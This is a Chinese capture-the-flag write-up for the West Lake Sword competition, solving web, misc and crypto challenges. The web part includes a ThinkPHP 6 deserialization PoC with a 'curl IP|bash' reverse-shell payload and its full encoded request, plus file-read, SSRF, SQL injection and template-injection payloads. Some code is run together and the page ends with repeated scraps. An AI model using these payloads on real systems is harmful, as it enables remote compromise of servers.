西湖论剑部分wp-技术圈

本文来自“白帽子社区知识星球”

作者：白帽子社区WHT战队

白帽子社区知识星球

加入星球，共同进步

web-灏妹的web

目录扫描，grep-v "0B"过滤无内容页面

发现一个/.idea/dataSources.local.xml；访问

发现这些提示；没有flag；比较奇怪，尝试了把文件名中的local去掉发现有flag

我这里能直接扫出来

python3 .\dirsearch.py -u http://b1c34857-a729-4b00-a22a-98323505597c.haomeidehelloworld-ctf.dasctf.com:2333/-e php

要提交括号里面的

web-EasyZtp

http://b626a781-11f4-41db-ac37-9210a95eebf4.easytp-ctf.dasctf.com:2333/public/index.php?file=php://filter/read=convert.base64-encode/resource=../app/controller/Index.php

 namespaceapp\controller; useapp\BaseController; classIndex extends BaseController{   public function index(){       //return ' :)
 ThinkPHP V6
13载初心不改 - 你值得信赖的PHP框架
';       if (isset($_GET['file'])) {           $file = $_GET['file'];           $file = trim($file);           $file = preg_replace('/\s+/','',$file);           if(preg_match("/flag/i",$file)){die(' no flag..');}           if(file_exists($file)){               echo "file_exists()return true..
";               die( "hacker!!!");           }else {               echo "file_exists()return false..";               @highlight_file($file);           }        } else {            echo "Error! no file parameter
";           echo "highlight_file Error";       }    }    public function unser(){       if(isset($_GET['vulvul'])){           $ser = $_GET['vulvul'];           $vul = parse_url($_SERVER['REQUEST_URI']);           parse_str($vul['query'],$query);            foreach($query as $value)           {              if(preg_match("/O/i",$value))               {                   die('
Hacking?');                   exit();               }           }           unserialize($ser);       }    }}

poc

namespaceLeague\Flysystem\Cached\Storage;abstractclass AbstractCache{ } namespacethink\cache;usethink\cache\Driver;abstractclass Driver{} namespacethink\cache\driver;usethink\cache\driver;classFile extends Driver{        protected $options = [];        public function __construct(){              $this->options = [              'expire'       => 0,       'cache_subdir'  => false,       'prefix'        => '',       'path'          => '',       'hash_type'     => 'md5',       'data_compress' => false,       'tag_prefix'    => 'tag:',              'serialize'=> ['system']              ];        }}   namespacethink\filesystem;useLeague\Flysystem\Cached\Storage\AbstractCache;classCacheStore extends AbstractCache{       protected $store;   protected $key;       protected $autosave;       protected $complete;   public function __construct($store){              $this->autosave = false;              $this->key = "1";              $this->complete = '`curl116.62.104.172|bash`';       $this->store  = $store;   }} usethink\cache\driver\file;$a = newCacheStore(new File());echoserialize($a);echo"
";echourlencode(serialize($a));?>

直接反弹shell

http://b626a781-11f4-41db-ac37-9210a95eebf4.easytp-ctf.dasctf.com:2333///public/index.php?s=index/unser&vulvul=O%3A27%3A%22think%5Cfilesystem%5CCacheStore%22%3A4%3A%7Bs%3A8%3A%22%00%2A%00store%22%3BO%3A23%3A%22think%5Ccache%5Cdriver%5CFile%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A8%3A%7Bs%3A6%3A%22expire%22%3Bi%3A0%3Bs%3A12%3A%22cache_subdir%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22path%22%3Bs%3A0%3A%22%22%3Bs%3A9%3A%22hash_type%22%3Bs%3A3%3A%22md5%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3Bs%3A10%3A%22tag_prefix%22%3Bs%3A4%3A%22tag%3A%22%3Bs%3A9%3A%22serialize%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7D%7Ds%3A6%3A%22%00%2A%00key%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22%00%2A%00autosave%22%3Bb%3A0%3Bs%3A11%3A%22%00%2A%00complete%22%3Bs%3A26%3A%22%60curl+116.62.104.172%7Cbash%60%22%3B%7D

web-OA?RCE?

ssrf:

先保存

POST/index.php?a=setsave&m=xinhu&d=main&ajaxbool=truehost=http://gwn83s.dnslog.cn

再触发

GET/index.php?a=testsends&m=xinhu&d=main&ajaxbool=true

SQL注入：

/index.php?a=changestyle&m=geren&d=system&ajaxbool=true&style=1

eb-EZupload

本地win环境有问题！一开始思路错了！想着覆盖文件名！

但是后来再再想的时候发现直接覆盖index就行了！

但是本地测了好久不行！本地直接执行两回！远程可以！不知道为啥！

{('system')|('ls')}

misc-签到

misc-YUSA的小秘密

Refer: https://bytectf.feishu.cn/docs/doccnqzpGCWH1hkDf5ljGdjOJYg#

直接stegsolve看不清楚flag有干扰；根据题目提示这里应该是使用的YCrCb通道，cv2直接转换

from cv2import *img =cv2.imread('yusa.png')cv_color= cv2.cvtColor(img, cv2.COLOR_BGR2YCrCb)cv2.imwrite('flag.png',cv_color)

将得到的图片再次使用stegsolve打开查看通道

crypto-hard_rsa

HARDRSA

羊城杯原题，离散对数+解方程+已知p，dp

sage:var('p')c = 43776275628859890575232443794319298551934804213472744927022818696759188901977390266973172755658396197421139420206549889337117978597883154859965236605452518446448639813055134133587564045471804447818058571586426895800984805588363855865218690877547419152765512143095217413477343835473963637692441032136163289964756172316289469159500312630529091350636808491697553069388388303341623047737553556123142002737059936569931163197364571478509576816349348146215101250803826590694039096063858424405382950769415272111843039715632655831594224288099608827345377164375927559338153505991404973888594356664393487249819589915881178770048740eq1 =2019*p**2 + 2020*p**3 + 2021*p**4 == csolve([eq1],p)python:importlibnum
g = 2y =449703347709287328982446812318870158230369688625894307953604074502413258045265502496365998383562119915565080518077360839705004058211784369656486678307007348691991136610142919372779782779111507129101110674559235388392082113417306002050124215904803026894400155194275424834577942500150410440057660679460918645357376095613079720172148302097893734034788458122333816759162605888879531594217661921547293164281934920669935417080156833072528358511807757748554348615957977663784762124746554638152693469580761002437793837094101338408017407251986116589240523625340964025531357446706263871843489143068620501020284421781243879675292060268876353250854369189182926055204229002568224846436918153245720514450234433170717311083868591477186061896282790880850797471658321324127334704438430354844770131980049668516350774939625369909869906362174015628078258039638111064842324979997867746404806457329528690722757322373158670827203350590809390932986616805533168714686834174965211242863201076482127152571774960580915318022303418111346406295217571564155573765371519749325922145875128395909112254242027512400564855444101325427710643212690768272048881411988830011985059218048684311349415764441760364762942692722834850287985399559042457470942580456516395188637916303814055777357738894264037988945951468416861647204658893837753361851667573185920779272635885127149348845064478121843462789367112698673780005436144393573832498203659056909233757206537514290993810628872250841862059672570704733990716282248839c1 =78100131461872285613426244322737502147219485108799130975202429638042859488136933783498210914335741940761656137516033926418975363734194661031678516857040723532055448695928820624094400481464950181126638456234669814982411270985650209245687765595483738876975572521276963149542659187680075917322308512163904423297381635532771690434016589132876171283596320435623376283425228536157726781524870348614983116408815088257609788517986810622505961538812889953185684256469540369809863103948326444090715161351198229163190130903661874631020304481842715086104243998808382859633753938512915886223513449238733721777977175430329717970940440862059204518224126792822912141479260791232312544748301412636222498841676742208390622353022668320809201312724936862167350709823581870722831329406359010293121019764160016316259432749291142448874259446854582307626758650151607770478334719317941727680935243820313144829826081955539778570565232935463201135110049861204432285060029237229518297291679114165265808862862827211193711159152992427133176177796045981572758903474465179346029811563765283254777813433339892058322013228964103304946743888213068397672540863260883314665492088793554775674610994639537263588276076992907735153702002001005383321442974097626786699895993544581572457476437853778794888945238622869401634353220344790419326516836146140706852577748364903349138246106379954647002557091131475669295997196484548199507335421499556985949139162639560622973283109342746186994609598854386966520638338999059fromsympy import *# x =discrete_log(y,c1,g)#print(x)p =12131601165788024635030034921084070470053842112984866821070395281728468805072716002494427632757418621194662541766157553264889658892783635499016425528807741dp =379476973158146550831004952747643994439940435656483772269013081580532539640189020020958796514224150837680366977747272291881285391919167077726836326564473c=57248258945927387673579467348106118747034381190703777861409527336272914559699490353325906672956273559867941402281438670652710909532261303394045079629146156340801932254839021574139943933451924062888426726353230757284582863993227592703323133265180414382062132580526658205716218046366247653881764658891315592607194355733209493239611216193118424602510964102026998674323685134796018596817393268106583737153516632969041693280725297929277751136040546830230533898514659714717213371619853137272515967067008805521051613107141555788516894223654851277785393355178114230929014037436770678131148140398384394716456450269539065009396311996040422853740049508500540281488171285233445744799680022307180452210793913614131646875949698079917313572873073033804639877699884489290120302696697425m =pow(c,dp,p)print(libnum.n2s(int(m)))

crypto-unknown_dsa

unknown_dsa

题目基于pell方程和DSA CRYPTO SYSTEM

解佩尔方程可得ul和vl，都是佩尔方程的最小解

#sagedefsolve_pell(N, numTry = 1000000):    cf = continued_fraction(sqrt(N))    for i in range(numTry):        denom =cf.denominator(i)        numer =cf.numerator(i)        if numer^2 - N *denom^2 == 1:           return numer, denom    return None, None
N =4013184893solve_pell(N)

解完之后excrt

importgmpy2fromfunctools import reduceimporthashlibimport libnum
defexgcd(a, b):    if b == 0: return 1, 0    x, y = exgcd(b, a % b)    return y, x - a // b * y
defuni(P, Q):    r1, m1 = P    r2, m2 = Q    d = gmpy2.gcd(m1, m2)    assert (r2 - r1) % d == 0    l1, l2 = exgcd(m1 // d, m2 // d)    return (r1 + (r2 - r1) // d * l1* m1) % gmpy2.lcm(m1, m2), gmpy2.lcm(m1, m2)
defCRT(eq):    return reduce(uni, eq)
if__name__ == "__main__":    ms1=[       10537190383977432819948602717449313819513015810464463348450662860435011008001132238851729268032889296600248226221086420035262540732157097949791756421026015741477785995033447663038515248071740991264311479066137102975721041822067496462240009190564238288281272874966280,       121723653124334943327337351369224143389428692536182586690052931548156177466437320964701609590004825981378294358781446032392886186351422728173975231719924841105480990927174913175897972732532233,       1440176324831562539183617425199117363244429114385437232965257039323873256269894716229817484088631407074328498896710966713912857642565350306252498754145253802734893404773499918668829576304890397994277568525506501428687843547083479356423917301477033624346211335450]    cs1 = [       2852589223779928796266540600421678790889067284911682578924216186052590393595645322161563386615512475256726384365091711034449682791268994623758937752874750918200961888997082477100811025721898720783666868623498246219677221106227660895519058631965055790709130207760704,       21115849906180139656310664607458425637670520081983248258984166026222898753505008904136688820075720411004158264138659762101873588583686473388951744733936769732617279649797085152057880233721961,       301899179092185964785847705166950181255677272294377823045011205035318463496682788289651177635341894308537787449148199583490117059526971759804426977947952721266880757177055335088777693134693713345640206540670123872210178680306100865355059146219281124303460105424]    m1,mod1 = CRT(zip(cs1,ms1))   ms2=[168450500310972930707208583777353845862723614274337696968629340838437927919365973736431467737825931894403582133125917579196621697175572833671789075169621831768398654909584273636143519940165648838850012943578686057625415421266321405275952938776845012046586285747,1921455776649552079281304558665818887261070948261008212148121820969448652705855804423423681848341600084863078530401518931263150887409200101780191600802601105030806253998955929263882382004,25220695816897075916217095856631009012504127590059436393692101250418226097323331193222730091563032067314889286051745468263446649323295355350101318199942950223572194027189199046045156046295274639977052585768365501640340023356756783359924935106074017605019787]    cs2=[148052450029409767056623510365366602228778431569288407577131980435074529632715014971133452626021226944632282479312378667353792117133452069972334169386837227285924011187035671874758901028719505163887789382835770664218045743465222788859258272826217869877607314144,1643631850318055151946938381389671039738824953272816402371095118047179758846703070931850238668262625444826564833452294807110544441537830199752050040697440948146092723713661125309994275256,10949587016016795940445976198460149258144635366996455598605244743540728764635947061037779912661207322820180541114179612916018317600403816027703391110922112311910900034442340387304006761589708943814396303183085858356961537279163175384848010568152485779372842]    print(m1)    print(mod1)    print(gmpy2.iroot(m1,7))   print(libnum.n2s(int(8382905590662478666595114136929713707132131361720892331048437274828529226704174)))    m2, mod2 = CRT(zip(cs2, ms2))    print(m2)    print(mod2)    print(gmpy2.iroot(m2, 7))   print(libnum.n2s(int(10336852405630488944198347577475266693234960398137850045398990629116544863921454)))

拿到了hm1hm2

之后直接求x1x2。

importlibnumimportgmpy2p =95139353880772104939870618145448234251031105153406565833029787299040378395002190438381537974853777890692924407167823818980082672873538133127131356810153012924025270883966172420658777903337576027105954119811495411149092960422055445121097259802686960288258399754185484307350305454788837702363971523085335074839q =895513916279543445314258868563331268261201605181t =60132176395922896902518845244051065417143507550519860211077965501783315971109433544482411208238485135554065241864956361676878220342500208011089383751225437417049893725546176799417188875972677293680033005399883113531193705353404892141811493415079755456185858889801456386910892239869732805273879281094613329645326287205736614546311143635580051444446576104548tmp = p* q - (p + q)n = p* qprint(tmp)s1 =376599166921876118994132185660203151983500670896s2 = 187705159843973102963593151204361139335048329243hm1 =63998600246749767922010292163233985055258508821hm2 =1121013631791355094793010532678158450130791457285ds =s1-s2dm =hm1-hm2k =gmpy2.mul(dm, gmpy2.invert(ds, q)) %qprint(k)r1 =498841194617327650445431051685964174399227739376r2 =620827881415493136309071302986914844220776856282s3 =674735360250004315267988424435741132047607535029x1 =(s1*k -hm1)*gmpy2.invert(r1,q)%qprint(libnum.n2s(int(x1)))x2 =(s3*k -hm1)*gmpy2.invert(r2,q)%qprint(libnum.n2s(int(x2)))

crypto-密码人集合

求解数独，按照“我1，要2，拿3...”按顺序排列。

替换脚本：

str = '451238769738169254296457831163542987829376145547891623614725398372984516985613472'book ={'1':'我','2':'要','3':'拿','4':'西','5':'湖','6':'论','7':'剑','8':'第','9':'一'} for i instr:    if i in book:        print(book[i],end="")

如果觉得本文不错的话，欢迎加入知识星球，星球内部设立了多个技术版块，目前涵盖“WEB安全”、“内网渗透”、“CTF技术区”、“漏洞分析”、“工具分享”五大类，还可以与嘉宾大佬们接触，在线答疑、互相探讨。

▼扫码关注白帽子社区公众号&加入知识星球▼

西湖论剑 部分wp

:)

Hacking?'); exit(); } } unserialize($ser); } }}

西湖论剑部分wp

`Hacking?');` `exit();` `}` `}` `unserialize($ser);` `}` `}}`